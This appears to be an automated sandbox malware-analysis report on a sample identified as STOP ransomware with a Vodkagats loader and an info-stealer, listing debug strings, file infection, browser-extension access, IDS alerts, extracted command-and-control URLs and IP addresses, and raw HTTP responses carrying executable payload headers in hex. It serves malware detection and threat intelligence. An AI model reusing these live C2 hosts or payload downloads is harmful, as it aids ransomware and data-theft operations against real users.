Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.bgzq source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2120473217.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098895786.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098836614.0000000003431000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ion Da source: UXNob1Dp32.exe, 00000005.00000003.2183537439.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176697587.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176771216.00000000036D3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175838580.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182163208.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\~18DQ source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195602941.0000000003844000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194961891.0000000003835000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000000B.00000000.1793257120.0000000000401000.00000020.00000001.01000000.00000009.sdmp, mstsca.exe, 00000020.00000000.3617544736.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2182544147.000000000344F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbAppCache133408904996229952.txt source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\\f source: UXNob1Dp32.exe, 00000005.00000003.2120429793.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119548064.000000000315D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*v source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\x source: UXNob1Dp32.exe, 00000005.00000003.2182625216.00000000037EC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189117308.00000000037ED000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188768311.00000000037AC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2187900703.0000000003785000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\% source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: UXNob1Dp32.exe, 00000005.00000003.2142833395.000000000367B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2143136874.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152955677.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2142833395.000000000367B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2143136874.0000000003693000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2075994382.000000000313B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2171385752.0000000003745000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\AC\3 source: UXNob1Dp32.exe, 00000005.00000003.2151962595.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151141564.000000000339B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\lpane5 source: UXNob1Dp32.exe, 00000005.00000003.1836470979.000000000318E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075833483.0000000003198000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836548366.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\k3a source: UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2098127230.0000000003196000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075833483.0000000003198000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098895786.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098836614.0000000003431000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: UXNob1Dp32.exe, 00000005.00000003.2098127230.0000000003196000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075833483.0000000003198000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\; source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\1 source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Ro source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ows\ source: UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Users source: UXNob1Dp32.exe, 00000005.00000003.2193278581.0000000003488000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2193874690.0000000003491000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194897418.0000000003498000.00000004.00000020.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	System file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html			Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	System file written: C:\Users\user\AppData\Local\Temp\chrome.exe			Jump to behavior

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_00410160
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_0040F730
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	1_2_0040FB98

Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49735 -> 189.245.19.217:80
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49733 -> 186.13.17.220:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49733 -> 186.13.17.220:80
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 189.245.19.217:80 -> 192.168.2.4:49734
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 189.245.19.217:80 -> 192.168.2.4:49735
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49736 -> 189.245.19.217:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49736 -> 189.245.19.217:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199673019888
Source: Malware configuration extractor	URLs: http://cajgtus.com/test2/get.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 03:07:01 GMTContent-Type: application/octet-streamContent-Length: 296448Last-Modified: Tue, 23 Apr 2024 19:19:16 GMTConnection: closeETag: "662809b4-48600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce d6 de 9e 8a b7 b0 cd 8a b7 b0 cd 8a b7 b0 cd 87 e5 6f cd 90 b7 b0 cd 87 e5 50 cd f6 b7 b0 cd 87 e5 51 cd a6 b7 b0 cd 83 cf 23 cd 83 b7 b0 cd 8a b7 b1 cd f8 b7 b0 cd 3f 29 55 cd 8b b7 b0 cd 87 e5 6b cd 8b b7 b0 cd 3f 29 6e cd 8b b7 b0 cd 52 69 63 68 8a b7 b0 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 47 05 fb 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 30 60 01 00 00 00 00 6d 40 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 61 01 00 04 00 00 00 d6 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 6a 01 00 64 00 00 00 00 40 60 01 66 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 60 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 e4 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 74 00 00 00 00 01 00 00 76 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 b5 5e 01 00 80 01 00 00 36 02 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 66 ef 00 00 00 40 60 01 00 f0 00 00 00 96 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 24 Apr 2024 03:07:24 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Mon, 09 Oct 2023 19:50:06 GMTETag: "4ae00-6074de5a4a562"Accept-Ranges: bytesContent-Length: 306688Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 95.217.9.149 95.217.9.149
Source: Joe Sandbox View	IP Address: 186.13.17.220 186.13.17.220
Source: Joe Sandbox View	IP Address: 104.21.65.24 104.21.65.24

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TechtelLMDSComunicacionesInteractivasSAAR TechtelLMDSComunicacionesInteractivasSAAR
Source: Joe Sandbox View	ASN Name: UninetSAdeCVMX UninetSAdeCVMX

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFCGIJKJKFHIDHIIIEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJECFCGHIDGHIDHDHIEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAKEHIIDGDAAKECBFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFCGIJKJKFHIDHIIIEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 7449Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
